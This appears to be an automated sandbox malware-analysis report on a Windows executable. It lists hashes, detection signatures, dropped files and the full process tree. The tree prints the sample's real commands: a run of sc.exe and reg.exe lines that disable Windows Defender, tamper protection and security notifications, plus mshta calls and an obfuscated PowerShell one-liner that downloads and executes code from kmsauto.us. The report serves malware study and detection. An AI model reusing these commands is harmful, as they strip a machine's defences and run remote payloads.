Analysis
-
max time kernel
78s -
max time network
126s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
29-08-2021 05:12
Static task
static1
Behavioral task
behavioral1
Sample
006b91eb_IHyB_31ECD.exe
Resource
win7v20210408
General
-
Target
006b91eb_IHyB_31ECD.exe
-
Size
1010KB
-
MD5
006b91eb6fe52d68af0c7e6b6ee0cdf5
-
SHA1
a797f0062757264d9ed96fb16dbbe1f997891cb4
-
SHA256
2181fc561eed3985e3f6922bfc50bb1a761377874ab0e86344bdc74505ed8f5c
-
SHA512
3318ae6b954591db13537c8c04630a9914cdd51bfd4ef7c372f7bfb2cd33f572d06041ed99b97ed44796a3654891e444598ab15a102d86efa7ae9a80afccc634
Malware Config
Extracted
https://kmsauto.us/ALL.txt
Extracted
https://kmsauto.us/ra/ALL.txt
Signatures
-
suricata: ET MALWARE PE EXE or DLL Windows file download Text
suricata: ET MALWARE PE EXE or DLL Windows file download Text
-
Blocklisted process makes network request 6 IoCs
Processes:
mshta.exemshta.exepowershell.exepowershell.exeflow pid process 34 1908 mshta.exe 35 3544 mshta.exe 36 3568 powershell.exe 37 4000 powershell.exe 43 4000 powershell.exe 44 4000 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
AZfzxQH4.comThud6vUm.comHJRNsXOY.compid process 388 AZfzxQH4.com 2760 Thud6vUm.com 1308 HJRNsXOY.com -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 792 3568 WerFault.exe powershell.exe 752 4000 WerFault.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 35 IoCs
Processes:
powershell.exepowershell.exeWerFault.exeWerFault.exepid process 4000 powershell.exe 3568 powershell.exe 4000 powershell.exe 3568 powershell.exe 3568 powershell.exe 4000 powershell.exe 792 WerFault.exe 792 WerFault.exe 792 WerFault.exe 792 WerFault.exe 792 WerFault.exe 792 WerFault.exe 792 WerFault.exe 792 WerFault.exe 792 WerFault.exe 792 WerFault.exe 792 WerFault.exe 792 WerFault.exe 792 WerFault.exe 792 WerFault.exe 752 WerFault.exe 752 WerFault.exe 752 WerFault.exe 752 WerFault.exe 752 WerFault.exe 752 WerFault.exe 752 WerFault.exe 752 WerFault.exe 752 WerFault.exe 752 WerFault.exe 752 WerFault.exe 752 WerFault.exe 752 WerFault.exe 752 WerFault.exe 752 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exeWerFault.exeWerFault.exedescription pid process Token: SeDebugPrivilege 3568 powershell.exe Token: SeDebugPrivilege 4000 powershell.exe Token: SeDebugPrivilege 792 WerFault.exe Token: SeDebugPrivilege 752 WerFault.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
006b91eb_IHyB_31ECD.exeThud6vUm.comHJRNsXOY.comAZfzxQH4.comcmd.execmd.exedescription pid process target process PID 564 wrote to memory of 388 564 006b91eb_IHyB_31ECD.exe AZfzxQH4.com PID 564 wrote to memory of 388 564 006b91eb_IHyB_31ECD.exe AZfzxQH4.com PID 564 wrote to memory of 388 564 006b91eb_IHyB_31ECD.exe AZfzxQH4.com PID 564 wrote to memory of 2760 564 006b91eb_IHyB_31ECD.exe Thud6vUm.com PID 564 wrote to memory of 2760 564 006b91eb_IHyB_31ECD.exe Thud6vUm.com PID 2760 wrote to memory of 1908 2760 Thud6vUm.com mshta.exe PID 2760 wrote to memory of 1908 2760 Thud6vUm.com mshta.exe PID 564 wrote to memory of 1308 564 006b91eb_IHyB_31ECD.exe HJRNsXOY.com PID 564 wrote to memory of 1308 564 006b91eb_IHyB_31ECD.exe HJRNsXOY.com PID 1308 wrote to memory of 3544 1308 HJRNsXOY.com mshta.exe PID 1308 wrote to memory of 3544 1308 HJRNsXOY.com mshta.exe PID 388 wrote to memory of 988 388 AZfzxQH4.com cmd.exe PID 388 wrote to memory of 988 388 AZfzxQH4.com cmd.exe PID 988 wrote to memory of 2172 988 cmd.exe sc.exe PID 988 wrote to memory of 2172 988 cmd.exe sc.exe PID 988 wrote to memory of 2288 988 cmd.exe sc.exe PID 988 wrote to memory of 2288 988 cmd.exe sc.exe PID 988 wrote to memory of 1596 988 cmd.exe sc.exe PID 988 wrote to memory of 1596 988 cmd.exe sc.exe PID 988 wrote to memory of 2120 988 cmd.exe sc.exe PID 988 wrote to memory of 2120 988 cmd.exe sc.exe PID 988 wrote to memory of 3856 988 cmd.exe sc.exe PID 988 wrote to memory of 3856 988 cmd.exe sc.exe PID 988 wrote to memory of 3852 988 cmd.exe reg.exe PID 988 wrote to memory of 3852 988 cmd.exe reg.exe PID 988 wrote to memory of 3928 988 cmd.exe reg.exe PID 988 wrote to memory of 3928 988 cmd.exe reg.exe PID 988 wrote to memory of 3904 988 cmd.exe reg.exe PID 988 wrote to memory of 3904 988 cmd.exe reg.exe PID 988 wrote to memory of 4040 988 cmd.exe reg.exe PID 988 wrote to memory of 4040 988 cmd.exe reg.exe PID 988 wrote to memory of 3208 988 cmd.exe reg.exe PID 988 wrote to memory of 3208 988 cmd.exe reg.exe PID 988 wrote to memory of 3736 988 cmd.exe reg.exe PID 988 wrote to memory of 3736 988 cmd.exe reg.exe PID 988 wrote to memory of 3260 988 cmd.exe reg.exe PID 988 wrote to memory of 3260 988 cmd.exe reg.exe PID 988 wrote to memory of 920 988 cmd.exe reg.exe PID 988 wrote to memory of 920 988 cmd.exe reg.exe PID 988 wrote to memory of 196 988 cmd.exe reg.exe PID 988 wrote to memory of 196 988 cmd.exe reg.exe PID 988 wrote to memory of 1980 988 cmd.exe reg.exe PID 988 wrote to memory of 1980 988 cmd.exe reg.exe PID 988 wrote to memory of 2768 988 cmd.exe reg.exe PID 988 wrote to memory of 2768 988 cmd.exe reg.exe PID 988 wrote to memory of 3600 988 cmd.exe reg.exe PID 988 wrote to memory of 3600 988 cmd.exe reg.exe PID 988 wrote to memory of 2832 988 cmd.exe reg.exe PID 988 wrote to memory of 2832 988 cmd.exe reg.exe PID 988 wrote to memory of 3604 988 cmd.exe reg.exe PID 988 wrote to memory of 3604 988 cmd.exe reg.exe PID 988 wrote to memory of 1304 988 cmd.exe reg.exe PID 988 wrote to memory of 1304 988 cmd.exe reg.exe PID 988 wrote to memory of 2252 988 cmd.exe reg.exe PID 988 wrote to memory of 2252 988 cmd.exe reg.exe PID 988 wrote to memory of 1596 988 cmd.exe cmd.exe PID 988 wrote to memory of 1596 988 cmd.exe cmd.exe PID 1596 wrote to memory of 2120 1596 cmd.exe reg.exe PID 1596 wrote to memory of 2120 1596 cmd.exe reg.exe PID 1596 wrote to memory of 3912 1596 cmd.exe find.exe PID 1596 wrote to memory of 3912 1596 cmd.exe find.exe PID 988 wrote to memory of 3900 988 cmd.exe reg.exe PID 988 wrote to memory of 3900 988 cmd.exe reg.exe PID 988 wrote to memory of 2664 988 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\006b91eb_IHyB_31ECD.exe"C:\Users\Admin\AppData\Local\Temp\006b91eb_IHyB_31ECD.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\AZfzxQH4.com"C:\Users\Admin\AppData\Local\Temp\AZfzxQH4.com"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\CBA2.tmp\CBA3.tmp\CBA4.bat C:\Users\Admin\AppData\Local\Temp\AZfzxQH4.com"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled4⤵
-
C:\Windows\system32\sc.exesc config SecurityHealthService start=disabled4⤵
-
C:\Windows\system32\sc.exesc config Sense start=disabled4⤵
-
C:\Windows\system32\sc.exesc config WdNisDrv start=disabled4⤵
-
C:\Windows\system32\sc.exesc config WdNisSvc start=disabled4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI" | find /i "SecHealthUI"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI"5⤵
-
C:\Windows\system32\find.exefind /i "SecHealthUI"5⤵
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral_neutral_cw5n1h2txyewy" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\S-1-5-21-1594587808-2047097707-2163810515-1000\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral_neutral_cw5n1h2txyewy" /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility4⤵
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility5⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender;" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v "Enabled" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f4⤵
-
C:\Users\Admin\AppData\Local\Temp\Thud6vUm.com"C:\Users\Admin\AppData\Local\Temp\Thud6vUm.com"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://kmsauto.us/ra/Encoding.txt3⤵
- Blocklisted process makes network request
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ra/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4000 -s 24645⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\HJRNsXOY.com"C:\Users\Admin\AppData\Local\Temp\HJRNsXOY.com"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://kmsauto.us/Encoding.txt3⤵
- Blocklisted process makes network request
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3568 -s 25325⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\AZfzxQH4.comMD5
1f460870b7a0a5979925cef15b0ca8ee
SHA14c5ac8f5ead53e0ba504c20c238e8f9fb3e435e6
SHA2567f1db23c8550c2baf0fc007b2ebf7532ceacb3e8f38d8edfb29b250c6fed5273
SHA512909826c719b23b4efd37fb53b0700394c398ff8da75f46833c70db16081121d22fd573c4133723f45c71f0b377ad458764140484329f07360a643263ac0ff2c0
-
C:\Users\Admin\AppData\Local\Temp\AZfzxQH4.comMD5
1f460870b7a0a5979925cef15b0ca8ee
SHA14c5ac8f5ead53e0ba504c20c238e8f9fb3e435e6
SHA2567f1db23c8550c2baf0fc007b2ebf7532ceacb3e8f38d8edfb29b250c6fed5273
SHA512909826c719b23b4efd37fb53b0700394c398ff8da75f46833c70db16081121d22fd573c4133723f45c71f0b377ad458764140484329f07360a643263ac0ff2c0
-
C:\Users\Admin\AppData\Local\Temp\CBA2.tmp\CBA3.tmp\CBA4.batMD5
4daac34f17ecb3f09ce92bf60d62144a
SHA173898316bf67ab815528d4996e7f04185297baa8
SHA2563f4f8c7e86bcc0432e2835771ae63fbc2b226be760c3190a96dcbe453cbbcb9d
SHA51209f5fc715324dae244c229673cc2a86e93ade56ecd841c1b430389322b6e6d259debd852cb1d6b260c2a27aa2086f16d16ca9be81b1ac69ecbb0ea1c399a0bd3
-
C:\Users\Admin\AppData\Local\Temp\HJRNsXOY.comMD5
b48dea0c642487df2482ab8fa55bb923
SHA150b00f687892a656319aefcecba535459e2d8a2d
SHA2560dfe7a93ff40834c072c7fdd9381771b1086b67f545fa83c766b2d67a911e47b
SHA5122b57678d9817fbc42c5d2f9e8b2cf0ff12b67882cc18e624422857be950810a4ea63c857700d7cf5a91ea66ed6a5074a3bfab6eff883c66457db8c611bde6e16
-
C:\Users\Admin\AppData\Local\Temp\HJRNsXOY.comMD5
b48dea0c642487df2482ab8fa55bb923
SHA150b00f687892a656319aefcecba535459e2d8a2d
SHA2560dfe7a93ff40834c072c7fdd9381771b1086b67f545fa83c766b2d67a911e47b
SHA5122b57678d9817fbc42c5d2f9e8b2cf0ff12b67882cc18e624422857be950810a4ea63c857700d7cf5a91ea66ed6a5074a3bfab6eff883c66457db8c611bde6e16
-
C:\Users\Admin\AppData\Local\Temp\Thud6vUm.comMD5
d38aea02881ff45b60e6b2c11cd44916
SHA1ab4d6992c292931c297ca55d3d2ee34df64b7f7b
SHA256aa7ff8badcffdff66df6d30bde51b6e3c960be0a3719b73d3875af8e1173bd94
SHA512c42fc67b08e130e2ea188328c7dbb69be6ae8c575cb79301117bbc22c4b292c59e0f186e25443e394fa36b34122c347c32e85d73716949812c3798880071ee7f
-
C:\Users\Admin\AppData\Local\Temp\Thud6vUm.comMD5
d38aea02881ff45b60e6b2c11cd44916
SHA1ab4d6992c292931c297ca55d3d2ee34df64b7f7b
SHA256aa7ff8badcffdff66df6d30bde51b6e3c960be0a3719b73d3875af8e1173bd94
SHA512c42fc67b08e130e2ea188328c7dbb69be6ae8c575cb79301117bbc22c4b292c59e0f186e25443e394fa36b34122c347c32e85d73716949812c3798880071ee7f
-
C:\Users\Public\ Microsoft.ps1MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/196-146-0x0000000000000000-mapping.dmp
-
memory/388-114-0x0000000000000000-mapping.dmp
-
memory/728-159-0x0000000000000000-mapping.dmp
-
memory/920-145-0x0000000000000000-mapping.dmp
-
memory/988-131-0x0000000000000000-mapping.dmp
-
memory/1304-152-0x0000000000000000-mapping.dmp
-
memory/1308-126-0x0000000000F80000-0x0000000000F81000-memory.dmpFilesize
4KB
-
memory/1308-123-0x0000000000000000-mapping.dmp
-
memory/1596-154-0x0000000000000000-mapping.dmp
-
memory/1596-135-0x0000000000000000-mapping.dmp
-
memory/1908-122-0x0000000000000000-mapping.dmp
-
memory/1980-147-0x0000000000000000-mapping.dmp
-
memory/2120-136-0x0000000000000000-mapping.dmp
-
memory/2120-155-0x0000000000000000-mapping.dmp
-
memory/2172-133-0x0000000000000000-mapping.dmp
-
memory/2252-153-0x0000000000000000-mapping.dmp
-
memory/2288-134-0x0000000000000000-mapping.dmp
-
memory/2300-162-0x0000000000000000-mapping.dmp
-
memory/2364-163-0x0000000000000000-mapping.dmp
-
memory/2664-158-0x0000000000000000-mapping.dmp
-
memory/2760-120-0x00000000004B0000-0x00000000004B1000-memory.dmpFilesize
4KB
-
memory/2760-117-0x0000000000000000-mapping.dmp
-
memory/2764-160-0x0000000000000000-mapping.dmp
-
memory/2768-148-0x0000000000000000-mapping.dmp
-
memory/2832-150-0x0000000000000000-mapping.dmp
-
memory/3208-142-0x0000000000000000-mapping.dmp
-
memory/3252-161-0x0000000000000000-mapping.dmp
-
memory/3260-144-0x0000000000000000-mapping.dmp
-
memory/3544-128-0x0000000000000000-mapping.dmp
-
memory/3568-186-0x000002912F5E3000-0x000002912F5E5000-memory.dmpFilesize
8KB
-
memory/3568-165-0x0000000000000000-mapping.dmp
-
memory/3568-224-0x0000029130FB0000-0x0000029130FCF000-memory.dmpFilesize
124KB
-
memory/3568-199-0x000002912F5E6000-0x000002912F5E8000-memory.dmpFilesize
8KB
-
memory/3568-189-0x000002914B620000-0x000002914B621000-memory.dmpFilesize
4KB
-
memory/3568-184-0x000002912F5E0000-0x000002912F5E2000-memory.dmpFilesize
8KB
-
memory/3600-149-0x0000000000000000-mapping.dmp
-
memory/3604-151-0x0000000000000000-mapping.dmp
-
memory/3736-143-0x0000000000000000-mapping.dmp
-
memory/3852-138-0x0000000000000000-mapping.dmp
-
memory/3856-137-0x0000000000000000-mapping.dmp
-
memory/3900-157-0x0000000000000000-mapping.dmp
-
memory/3904-140-0x0000000000000000-mapping.dmp
-
memory/3912-156-0x0000000000000000-mapping.dmp
-
memory/3928-139-0x0000000000000000-mapping.dmp
-
memory/4000-187-0x0000023D1DFC3000-0x0000023D1DFC5000-memory.dmpFilesize
8KB
-
memory/4000-182-0x0000023D1DFC0000-0x0000023D1DFC2000-memory.dmpFilesize
8KB
-
memory/4000-176-0x0000023D385C0000-0x0000023D385C1000-memory.dmpFilesize
4KB
-
memory/4000-200-0x0000023D1DFC6000-0x0000023D1DFC8000-memory.dmpFilesize
8KB
-
memory/4000-164-0x0000000000000000-mapping.dmp
-
memory/4040-141-0x0000000000000000-mapping.dmp